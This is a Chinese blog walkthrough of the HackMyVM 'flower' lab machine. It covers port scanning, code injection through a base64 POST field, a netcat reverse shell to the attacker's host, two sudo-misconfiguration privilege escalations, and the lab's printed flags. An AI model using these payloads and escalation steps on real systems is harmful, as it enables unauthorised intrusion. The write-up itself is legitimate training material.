Pepster'Blog
HackMyVM-flower靶机详解WP
城南花已开 Lv5
  2024-11-26 20:21:56   2025-01-22 19:49:12    1.2k 字  6 分钟  

信息收集

服务探测

👌扫一下端口开放,可以看到只开放了80端口,开了http服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0c       (Unknown: locally administered)
192.168.56.100  08:00:27:20:e1:73       (Unknown)
192.168.56.107  08:00:27:38:65:68       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.887 seconds (135.67 hosts/sec). 3 responded

┌──(kali㉿kali)-[~]
└─$ ip=192.168.56.107

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -A -p- $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 07:23 EST
Nmap scan report for 192.168.56.107
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:38:65:68 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.06 ms 192.168.56.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.83 seconds

页面是这样的,没有啥有价值的信息,扫了下目录,扫出一堆apache的说明文档,哈哈哈🤣

image

当我们选择花的类型时,提交后会显示花瓣有几朵,尝试使用Burpsuite抓包看一下

这里我选了百合Lily会有一个POST请求,有个base64编码后的数字,计算后显示在网页上

image

那我使用HackBar方便点,尝试利用system(ls);显示当前目录下的文件

image

发现是可行的,那就直接反弹Shell到Kali

image

Body改为petals=c3lzdGVtKCJuYyAtYyBzaCAxOTIuMTY4LjU2LjEwMiA0NDQ0Iik7即可反弹过来

用户提权

设置稳定的交互式终端后,查找有用信息

发现在用户文件夹下有个python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
www-data@flower:/home$ cd rose/
www-data@flower:/home/rose$ ls
diary  user.txt
www-data@flower:/home/rose$ ls -la
total 32
drwxrwxr-x 3 rose rose 4096 Nov 30  2020 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rwx------ 1 rose rose  120 Nov 30  2020 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 2 rose rose 4096 Nov 30  2020 diary   ##权限为777
-rw------- 1 rose rose   20 Nov 30  2020 user.txt
www-data@flower:/home/rose$ cd diary/
www-data@flower:/home/rose/diary$ ls
diary.py
www-data@flower:/home/rose/diary$ cat diary.py
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)

单独查看python脚本发现是个反序列化

1
2
3
4
5
6
7
8
9
import pickle

# 打开文件用于读取二进制数据
with open('diary.pickle', 'rb') as p:
    # 反序列化文件内容到字典
    loaded_diary = pickle.load(p)

# 打印加载的字典
print(loaded_diary)

既然这个脚本是个反序列化,那我们可以创建一个序列化后的diary.pickle文件,以供这个脚本进行反序列化

同时我们还发现这个www-data有sudo权限,可以以rose的身份进行执行/usr/bin/python3 /home/rose/diary/diary.py

1
2
3
4
5
6
7
www-data@flower:/home/rose/diary$ sudo -l
Matching Defaults entries for www-data on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
    (rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py

我回顾了一下,发现diary的目录权限为777,那我直接把diary.py删了新建个不久完了

直接秒杀😋

1
2
3
4
5
6
7
8
9
10
www-data@flower:/home/rose/diary$ ls
diary.pickle  diary.py
www-data@flower:/home/rose/diary$ rm diary.py
rm: remove write-protected regular file 'diary.py'? y
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$ cd ~
rose@flower:~$ ls
diary  user.txt
rose@flower:~$ cat user.txt
HMV{R0ses_are_R3d$}

Root提权

发现用户rose也有sudo权限

1
2
3
4
5
6
7
8
9
10
11
12
rose@flower:~$ sudo -l
Matching Defaults entries for rose on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rose may run the following commands on flower:
    (root) NOPASSWD: /bin/bash /home/rose/.plantbook
rose@flower:~$ cat .plantbook
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)

我们对.plantbook有读写执行权限,直接改不就完了

1
2
3
4
5
6
7
8
9
10
11
rose@flower:~$ ls -al
total 36
drwxrwxr-x 3 rose rose 4096 Nov 26 08:07 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw------- 1 rose rose   28 Nov 26 08:07 .bash_history
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rwx------ 1 rose rose  120 Nov 30  2020 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 2 rose rose 4096 Nov 26 08:06 diary
-rw------- 1 rose rose   20 Nov 30  2020 user.txt
1
2
3
4
5
6
7
8
9
rose@flower:~$ echo -n "bash -p ">.plantbook
rose@flower:~$ sudo /bin/bash /home/rose/.plantbook
root@flower:/home/rose# ls
diary  user.txt
root@flower:/home/rose# cd ~
root@flower:~# ls
root.txt
root@flower:~# cat root.txt
HMV{R0ses_are_als0_black.}

这个靶机非常简单,可以算是泡面🐔了

  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
  2. 用户提权
  3. Root提权